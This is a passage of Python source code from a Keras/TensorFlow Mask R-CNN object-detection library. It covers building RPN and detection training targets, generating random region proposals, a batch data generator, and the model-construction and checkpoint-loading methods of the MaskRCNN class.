gt_class_ids = gt_class_ids[instance_ids]
gt_boxes = gt_boxes[instance_ids]
gt_masks = gt_masks[:, :, instance_ids]
# Compute areas of ROIs and ground truth boxes.
rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \
(rpn_rois[:, 3] - rpn_rois[:, 1])
gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \
(gt_boxes[:, 3] - gt_boxes[:, 1])
# Compute overlaps [rpn_rois, gt_boxes]
overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0]))
for i in range(overlaps.shape[1]):
gt = gt_boxes[i]
overlaps[:, i] = utils.compute_iou(
gt, rpn_rois, gt_box_area[i], rpn_roi_area)
# Assign ROIs to GT boxes
rpn_roi_iou_argmax = np.argmax(overlaps, axis=1)
rpn_roi_iou_max = overlaps[np.arange(
overlaps.shape[0]), rpn_roi_iou_argmax]
# GT box assigned to each ROI
rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax]
rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax]
# Positive ROIs are those with >= 0.5 IoU with a GT box.
fg_ids = np.where(rpn_roi_iou_max > 0.5)[0]
# Negative ROIs are those with max IoU 0.1-0.5 (hard example mining)
# TODO: To hard example mine or not to hard example mine, that's the question
# bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0]
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
# Subsample ROIs. Aim for 33% foreground.
# FG
fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO)
if fg_ids.shape[0] > fg_roi_count:
keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False)
else:
keep_fg_ids = fg_ids
# BG
remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0]
if bg_ids.shape[0] > remaining:
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
else:
keep_bg_ids = bg_ids
# Combine indices of ROIs to keep
keep = np.concatenate([keep_fg_ids, keep_bg_ids])
# Need more?
remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0]
if remaining > 0:
# Looks like we don't have enough samples to maintain the desired
# balance. Reduce requirements and fill in the rest. This is
# likely different from the Mask RCNN paper.
# There is a small chance we have neither fg nor bg samples.
if keep.shape[0] == 0:
# Pick bg regions with easier IoU threshold
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
assert bg_ids.shape[0] >= remaining
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
assert keep_bg_ids.shape[0] == remaining
keep = np.concatenate([keep, keep_bg_ids])
else:
# Fill the rest with repeated bg rois.
keep_extra_ids = np.random.choice(
keep_bg_ids, remaining, replace=True)
keep = np.concatenate([keep, keep_extra_ids])
assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \
"keep doesn't match ROI batch size {}, {}".format(
keep.shape[0], config.TRAIN_ROIS_PER_IMAGE)
# Reset the gt boxes assigned to BG ROIs.
rpn_roi_gt_boxes[keep_bg_ids, :] = 0
rpn_roi_gt_class_ids[keep_bg_ids] = 0
# For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement.
rois = rpn_rois[keep]
roi_gt_boxes = rpn_roi_gt_boxes[keep]
roi_gt_class_ids = rpn_roi_gt_class_ids[keep]
roi_gt_assignment = rpn_roi_iou_argmax[keep]
# Class-aware bbox deltas. [y, x, log(h), log(w)]
bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE,
config.NUM_CLASSES, 4), dtype=np.float32)
pos_ids = np.where(roi_gt_class_ids > 0)[0]
bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement(
rois[pos_ids], roi_gt_boxes[pos_ids, :4])
# Normalize bbox refinements
bboxes /= config.BBOX_STD_DEV
# Generate class-specific target masks
masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES),
dtype=np.float32)
for i in pos_ids:
class_id = roi_gt_class_ids[i]
assert class_id > 0, "class id must be greater than 0"
gt_id = roi_gt_assignment[i]
class_mask = gt_masks[:, :, gt_id]
if config.USE_MINI_MASK:
# Create a mask placeholder, the size of the image
placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool)
# GT box
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id]
gt_w = gt_x2 - gt_x1
gt_h = gt_y2 - gt_y1
# Resize mini mask to size of GT box
placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \
np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool)
# Place the mini batch in the placeholder
class_mask = placeholder
# Pick part of the mask and resize it
y1, x1, y2, x2 = rois[i].astype(np.int32)
m = class_mask[y1:y2, x1:x2]
mask = utils.resize(m, config.MASK_SHAPE)
masks[i, :, :, class_id] = mask
return rois, roi_gt_class_ids, bboxes, masks
def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2)]
gt_class_ids: [num_gt_boxes] Integer class IDs.
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)]
Returns:
rpn_match: [N] (int32) matches between anchors and GT boxes.
1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
"""
# RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32)
# RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))]
rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4))
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = np.where(gt_class_ids < 0)[0]
if crowd_ix.shape[0] > 0:
# Filter out crowds from ground truth class IDs and boxes
non_crowd_ix = np.where(gt_class_ids > 0)[0]
crowd_boxes = gt_boxes[crowd_ix]
gt_class_ids = gt_class_ids[non_crowd_ix]
gt_boxes = gt_boxes[non_crowd_ix]
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes)
crowd_iou_max = np.amax(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
else:
# All anchors don't intersect a crowd
no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool)
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = utils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= 0.7 then it's positive.
# If an anchor overlaps a GT box with IoU < 0.3 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.3).
#
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1
# 2. Set an anchor for each GT box (regardless of IoU value).
# If multiple anchors have the same IoU match all of them
gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:, 0]
rpn_match[gt_iou_argmax] = 1
# 3. Set anchors with high overlap as positive.
rpn_match[anchor_iou_max >= 0.7] = 1
# Subsample to balance positive and negative anchors
# Don't let positives be more than half the anchors
ids = np.where(rpn_match == 1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# Same for negative proposals
ids = np.where(rpn_match == -1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE -
np.sum(rpn_match == 1))
if extra > 0:
# Rest the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# For positive anchors, compute shift and scale needed to transform them
# to match the corresponding GT boxes.
ids = np.where(rpn_match == 1)[0]
ix = 0 # index into rpn_bbox
# TODO: use box_refinement() rather than duplicating the code here
for i, a in zip(ids, anchors[ids]):
# Closest gt box (it might have IoU < 0.7)
gt = gt_boxes[anchor_iou_argmax[i]]
# Convert coordinates to center plus width/height.
# GT Box
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
# Compute the bbox refinement that the RPN should predict.
rpn_bbox[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
]
# Normalize
rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV
ix += 1
return rpn_match, rpn_bbox
def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):
"""Generates ROI proposals similar to what a region proposal network
would generate.
image_shape: [Height, Width, Depth]
count: Number of ROIs to generate
gt_class_ids: [N] Integer ground truth class IDs
gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.
Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.
"""
# placeholder
rois = np.zeros((count, 4), dtype=np.int32)
# Generate random ROIs around GT boxes (90% of count)
rois_per_box = int(0.9 * count / gt_boxes.shape[0])
for i in range(gt_boxes.shape[0]):
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]
h = gt_y2 - gt_y1
w = gt_x2 - gt_x1
# random boundaries
r_y1 = max(gt_y1 - h, 0)
r_y2 = min(gt_y2 + h, image_shape[0])
r_x1 = max(gt_x1 - w, 0)
r_x2 = min(gt_x2 + w, image_shape[1])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))
x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:rois_per_box]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:rois_per_box]
if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
box_rois = np.hstack([y1, x1, y2, x2])
rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois
# Generate random ROIs anywhere in the image (10% of count)
remaining_count = count - (rois_per_box * gt_boxes.shape[0])
# To avoid generating boxes with zero area, we generate double what
# we need and filter out the extra. If we get fewer valid boxes
# than we need, we loop and try again.
while True:
y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))
x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))
# Filter out zero area boxes
threshold = 1
y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >=
threshold][:remaining_count]
x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >=
threshold][:remaining_count]
if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:
break
# Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape
# into x1, y1, x2, y2 order
x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)
y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)
global_rois = np.hstack([y1, x1, y2, x2])
rois[-remaining_count:] = global_rois
return rois
class DataGenerator(KU.Sequence):
"""An iterable that returns images and corresponding target class ids,
bounding box deltas, and masks.
It inherits from keras.utils.Sequence to avoid data redundancy when multiprocessing=True.
dataset: The Dataset object to pick data from
config: The model config object
shuffle: If True, shuffles the samples before every epoch
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
random_rois: If > 0 then generate proposals to be used to train the
network classifier and mask heads. Useful if training
the Mask RCNN part without the RPN.
batch_size: How many images to return in each call
detection_targets: If True, generate detection targets (class IDs, bbox
deltas, and masks). Typically for debugging or visualizations because
in trainig detection targets are generated by DetectionTargetLayer.
Returns a Python iterable. Upon calling __getitem__() on it, the
iterable returns two lists, inputs and outputs. The contents
of the lists differ depending on the received arguments:
inputs list:
- images: [batch, H, W, C]
- image_meta: [batch, (meta data)] Image details. See compose_image_meta()
- rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)
- rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
- gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs
- gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]
- gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width
are those of the image unless use_mini_mask is True, in which
case they are defined in MINI_MASK_SHAPE.
outputs list: Usually empty in regular training. But if detection_targets
is True then the outputs list contains target class_ids, bbox deltas,
and masks.
"""
def __init__(self, dataset, config, shuffle=True, augmentation=None,
random_rois=0, batch_size=1, detection_targets=False):
self.dataset = dataset
self.config = config
self.shuffle = shuffle
self.augmentation = augmentation
self.random_rois = random_rois
self.batch_size = batch_size
self.detection_targets = detection_targets
self.image_ids = np.copy(dataset.image_ids)
# Anchors
# [anchor_count, (y1, x1, y2, x2)]
self.backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)
self.anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
self.backbone_shapes,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
def __len__(self):
return int(np.ceil(len(self.image_ids) / float(self.batch_size)))
def __getitem__(self, idx):
b = 0 # batch item index
image_index = -1
while b < self.batch_size:
# Increment index to pick next image. Shuffle if at the start of an epoch.
image_index = (image_index + 1) % len(self.image_ids)
if self.shuffle and image_index == 0:
np.random.shuffle(self.image_ids)
# Get GT bounding boxes and masks for image.
image_id = self.image_ids[image_index]
image, image_meta, gt_class_ids, gt_boxes, gt_masks = \
load_image_gt(self.dataset, self.config, image_id,
augmentation=self.augmentation,
use_mini_mask=self.config.USE_MINI_MASK)
# Skip images that have no instances. This can happen in cases
# where we train on a subset of classes and the image doesn't
# have any of the classes we care about.
if not np.any(gt_class_ids > 0):
continue
# RPN Targets
rpn_match, rpn_bbox = build_rpn_targets(image.shape, self.anchors,
gt_class_ids, gt_boxes, self.config)
# Mask R-CNN Targets
if self.random_rois:
rpn_rois = generate_random_rois(
image.shape, self.random_rois, gt_class_ids, gt_boxes)
if self.detection_targets:
rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = \
build_detection_targets(
rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
# Init batch arrays
if b == 0:
batch_image_meta = np.zeros(
(self.batch_size,) + image_meta.shape, dtype=image_meta.dtype)
batch_rpn_match = np.zeros(
[self.batch_size, self.anchors.shape[0], 1], dtype=rpn_match.dtype)
batch_rpn_bbox = np.zeros(
[self.batch_size, self.config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)
batch_images = np.zeros(
(self.batch_size,) + image.shape, dtype=np.float32)
batch_gt_class_ids = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES), dtype=np.int32)
batch_gt_boxes = np.zeros(
(self.batch_size, self.config.MAX_GT_INSTANCES, 4), dtype=np.int32)
batch_gt_masks = np.zeros(
(self.batch_size, gt_masks.shape[0], gt_masks.shape[1],
self.config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)
if self.random_rois:
batch_rpn_rois = np.zeros(
(self.batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)
if self.detection_targets:
batch_rois = np.zeros(
(self.batch_size,) + rois.shape, dtype=rois.dtype)
batch_mrcnn_class_ids = np.zeros(
(self.batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)
batch_mrcnn_bbox = np.zeros(
(self.batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)
batch_mrcnn_mask = np.zeros(
(self.batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)
# If more instances than fits in the array, sub-sample from them.
if gt_boxes.shape[0] > self.config.MAX_GT_INSTANCES:
ids = np.random.choice(
np.arange(gt_boxes.shape[0]), self.config.MAX_GT_INSTANCES, replace=False)
gt_class_ids = gt_class_ids[ids]
gt_boxes = gt_boxes[ids]
gt_masks = gt_masks[:, :, ids]
# Add to batch
batch_image_meta[b] = image_meta
batch_rpn_match[b] = rpn_match[:, np.newaxis]
batch_rpn_bbox[b] = rpn_bbox
batch_images[b] = mold_image(image.astype(np.float32), self.config)
batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids
batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes
batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks
if self.random_rois:
batch_rpn_rois[b] = rpn_rois
if self.detection_targets:
batch_rois[b] = rois
batch_mrcnn_class_ids[b] = mrcnn_class_ids
batch_mrcnn_bbox[b] = mrcnn_bbox
batch_mrcnn_mask[b] = mrcnn_mask
b += 1
inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,
batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]
outputs = []
if self.random_rois:
inputs.extend([batch_rpn_rois])
if self.detection_targets:
inputs.extend([batch_rois])
# Keras requires that output and targets have the same number of dimensions
batch_mrcnn_class_ids = np.expand_dims(
batch_mrcnn_class_ids, -1)
outputs.extend(
[batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])
return inputs, outputs
############################################################
# MaskRCNN Class
############################################################
class MaskRCNN():
"""Encapsulates the Mask RCNN model functionality.
The actual Keras model is in the keras_model property.
"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
"""Build Mask R-CNN architecture.
input_shape: The shape of the input image.
mode: Either "training" or "inference". The inputs and
outputs of the model differ accordingly.
"""
assert mode in ['training', 'inference']
# Image size must be dividable by 2 multiple times
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
raise Exception("Image size must be dividable by 2 at least 6 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
# Inputs
input_image = KL.Input(
shape=[None, None, config.IMAGE_SHAPE[2]], name="input_image")
input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE],
name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes, and masks)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
gt_boxes = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_gt_boxes)
# 3. GT Masks (zero padded)
# [batch, height, width, MAX_GT_INSTANCES]
if config.USE_MINI_MASK:
input_gt_masks = KL.Input(
shape=[config.MINI_MASK_SHAPE[0],
config.MINI_MASK_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
else:
input_gt_masks = KL.Input(
shape=[config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1], None],
name="input_gt_masks", dtype=bool)
elif mode == "inference":
# Anchors in normalized coordinates
input_anchors = KL.Input(shape=[None, 4], name="input_anchors")
# Build the shared convolutional layers.
# Bottom-up Layers
# Returns a list of the last layers of each stage, 5 in total.
# Don't create the thead (stage 5), so we pick the 4th item in the list.
if callable(config.BACKBONE):
_, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,
train_bn=config.TRAIN_BN)
else:
_, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE,
stage5=True, train_bn=config.TRAIN_BN)
# Top-down Layers
# TODO: add assert to varify feature map sizes match what's in config
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)
P4 = KL.Add(name="fpn_p4add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p5upsampled")(P5),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])
P3 = KL.Add(name="fpn_p3add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p4upsampled")(P4),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])
P2 = KL.Add(name="fpn_p2add")([
KL.UpSampling2D(size=(2, 2), name="fpn_p3upsampled")(P3),
KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])
# Attach 3x3 conv to all P layers to get the final feature maps.
P2 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p2")(P2)
P3 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p3")(P3)
P4 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p4")(P4)
P5 = KL.Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding="SAME", name="fpn_p5")(P5)
# P6 is used for the 5th anchor scale in RPN. Generated by
# subsampling from P5 with stride of 2.
P6 = KL.MaxPooling2D(pool_size=(1, 1), strides=2, name="fpn_p6")(P5)
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
# Anchors
if mode == "training":
anchors = self.get_anchors(config.IMAGE_SHAPE)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)
# A hack to get around Keras's bad support for constants
# This class returns a constant layer
class ConstLayer(KE.Layer):
def __init__(self, x, name=None):
super(ConstLayer, self).__init__(name=name)
self.x = tf.Variable(x)
def call(self, input):
return self.x
anchors = ConstLayer(anchors, name="anchors")(input_image)
else:
anchors = input_anchors
# RPN Model
rpn = build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(
proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
config=config)([rpn_class, rpn_bbox, anchors])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
active_class_ids = KL.Lambda(
lambda x: parse_image_meta_graph(x)["active_class_ids"]
)(input_image_meta)
if not config.USE_RPN_ROIS:
# Ignore predicted ROIs and use ROIs provided as an input.
input_rois = KL.Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],
name="input_roi", dtype=np.int32)
# Normalize coordinates
target_rois = KL.Lambda(lambda x: norm_boxes_graph(
x, K.shape(input_image)[1:3]))(input_rois)
else:
target_rois = rpn_rois
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox, target_mask =\
DetectionTargetLayer(config, name="proposal_targets")([
target_rois, input_gt_class_ids, gt_boxes, input_gt_masks])
# Network Heads
# TODO: verify that this handles zero padded ROIs
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
mrcnn_mask = build_fpn_mask_graph(rois, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
# TODO: clean up (use tf.identify if necessary)
output_rois = KL.Lambda(lambda x: x * 1, name="output_rois")(rois)
# Losses
rpn_class_loss = KL.Lambda(lambda x: rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, mrcnn_class_logits, active_class_ids])
bbox_loss = KL.Lambda(lambda x: mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, mrcnn_bbox])
mask_loss = KL.Lambda(lambda x: mrcnn_mask_loss_graph(*x), name="mrcnn_mask_loss")(
[target_mask, target_class_ids, mrcnn_mask])
# Model
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes, input_gt_masks]
if not config.USE_RPN_ROIS:
inputs.append(input_rois)
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
mrcnn_class_logits, mrcnn_class, mrcnn_bbox, mrcnn_mask,
rpn_rois, output_rois,
rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss, mask_loss]
model = KM.Model(inputs, outputs, name='mask_rcnn')
else:
# Network Heads
# Proposal classifier and BBox regressor heads
mrcnn_class_logits, mrcnn_class, mrcnn_bbox =\
fpn_classifier_graph(rpn_rois, mrcnn_feature_maps, input_image_meta,
config.POOL_SIZE, config.NUM_CLASSES,
train_bn=config.TRAIN_BN,
fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in
# normalized coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, mrcnn_class, mrcnn_bbox, input_image_meta])
# Create masks for detections
detection_boxes = KL.Lambda(lambda x: x[..., :4])(detections)
mrcnn_mask = build_fpn_mask_graph(detection_boxes, mrcnn_feature_maps,
input_image_meta,
config.MASK_POOL_SIZE,
config.NUM_CLASSES,
train_bn=config.TRAIN_BN)
model = KM.Model([input_image, input_image_meta, input_anchors],
[detections, mrcnn_class, mrcnn_bbox,
mrcnn_mask, rpn_rois, rpn_class, rpn_bbox],
name='mask_rcnn')
# Add multi-GPU support.
if config.GPU_COUNT > 1:
from mrcnn.parallel_model import ParallelModel
model = ParallelModel(model, config.GPU_COUNT)
return model
def find_last(self):
"""Finds the last checkpoint file of the last trained model in the
model directory.
Returns:
The path of the last checkpoint file
"""
# Get directory names. Each directory corresponds to a model
dir_names = next(os.walk(self.model_dir))[1]
key = self.config.NAME.lower()
dir_names = filter(lambda f: f.startswith(key), dir_names)
dir_names = sorted(dir_names)
if not dir_names:
import errno
raise FileNotFoundError(
errno.ENOENT,
"Could not find model directory under {}".format(self.model_dir))
# Pick last directory
dir_name = os.path.join(self.model_dir, dir_names[-1])
# Find the last checkpoint
checkpoints = next(os.walk(dir_name))[2]
checkpoints = filter(lambda f: f.startswith("mask_rcnn"), checkpoints)
checkpoints = sorted(checkpoints)
if not checkpoints:
import errno
raise FileNotFoundError(
errno.ENOENT, "Could not find weight files in {}".format(dir_name))
checkpoint = os.path.join(dir_name, checkpoints[-1])
return checkpoint
def load_weights(self, filepath, by_name=False, exclude=None):
"""Modified version of the corresponding Keras function with
the addition of multi-GPU support and the ability to exclude
some layers from loading.
exclude: list of layer names to exclude
"""
import h5py
from tensorflow.python.keras.saving import hdf5_format
if exclude:
by_name = True
if h5py is None:
raise ImportError('`load_weights` requires h5py.')
with h5py.File(filepath, mode='r') as f:
if 'layer_names' not in f.attrs and 'model_weights' in f:
f = f['model_weights']
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
keras_model = self.keras_model
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
# Exclude some layers
if exclude:
